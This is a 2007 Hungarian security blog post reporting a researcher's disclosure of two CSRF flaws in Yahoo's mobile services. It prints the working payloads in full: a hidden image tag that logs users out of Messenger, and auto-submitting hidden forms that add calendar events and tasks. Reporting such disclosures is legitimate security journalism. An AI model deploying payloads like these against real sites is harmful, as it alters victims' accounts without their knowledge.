Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

A Yahoon a sor

2007.10.11. 09:36 | buherator | Szólj hozzá!

A vihar csendesedni látszik a Google körül, de a szél a felhőket a Yahoo felé sodorja: Nitesh Dhanjani két CSRF támadást mutatott be a Yahoo ellen. A kihasznált hibák nem a fő webes alkalmazásokat, hanem a mobil eszközökre szánt WAP és mobil web szolgáltatásokat érintik (mint anno a Freemailnél - ha emlékszik rá egyáltalán valaki ;), de a támadások weben kereszül is kivitelezhetők.

Az első, kevésbé súlyos hiba a Yahoo Instant Messengert érinti. Az alábbi kódot tartalmazó weboldalt meglátogató felhasználót kilépteti a rendszer:

<img src="http://us.m.yahoo.com/p/messenger?tsrc=rawfront" height="0" width="0"/>

A második, jóval súlyosabb hiba a Naptár szolgáltatást érinti, az alábbi kód segítségével tetszőleges bejegyzést adhatunk vagy törölhetünk az aktív Yahoo sessionnel rendelkező naptárjához/ból:

<form name="csrfevent" action="http://wap.oa.yahoo.com/raw?dp=cale&ae=y&v=6&i=0&t=1111111111" method="post" target="hidden">
    <input type="hidden" name="ySiD" value="" />
    <input type="hidden" name="tt" value="XSRF Demonstration event" />
    <input type="hidden" name="mdy" value="10%2F10%2F2007" />
    <input type="hidden" name="hm" value="01%3A00" />
    <input type="hidden" name="ap" value="pm" />
    <input type="hidden" name="dh" value="12" />
    <input type="hidden" name="dm" value="45" />
    <input type="hidden" name="sh" value="0" />
    <input type="hidden" name="dd" value="Yahoo XSRF demonstration event" />
    <input type="hidden" name="Save" value="Save" />                 
</form>
   
<form name="csrftask" action="http://wap.oa.yahoo.com/raw?dp=cale&v=34&v=6&i=0&t=1111111111" method="post" target="hidden">
    <input type="hidden" name="ySiD" value="" />
    <input type="hidden" name="todo" value="y" />
    <input type="hidden" name="srt" value="y" />
    <input type="hidden" name="tt" value="XSRF demonstration task" />
    <input type="hidden" name="mdy" value="10%2F10%2F2007" />
    <input type="hidden" name="pri" value="1" />
    <input type="hidden" name="sh" value="0" />
    <input type="hidden" name="dd" value="Yahoo XSRF demonstration task" />
    <input type="hidden" name="Save" value="Save" />
    <input type="hidden" name="golink" value="v%3D" />
</form>

<script>document.csrfevent.submit();</script>
<script>document.csrftask.submit();</script>


A hiba remek lehetőséget nyújt az adathalászoknak, spammereknek, illetve más típusú csalóknak. Dhanjani értesítette a Yahoot a dologról, reméljük mielőbb megszületik a javítás!

Címkék: yahoo csrf

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Nincsenek hozzászólások.
süti beállítások módosítása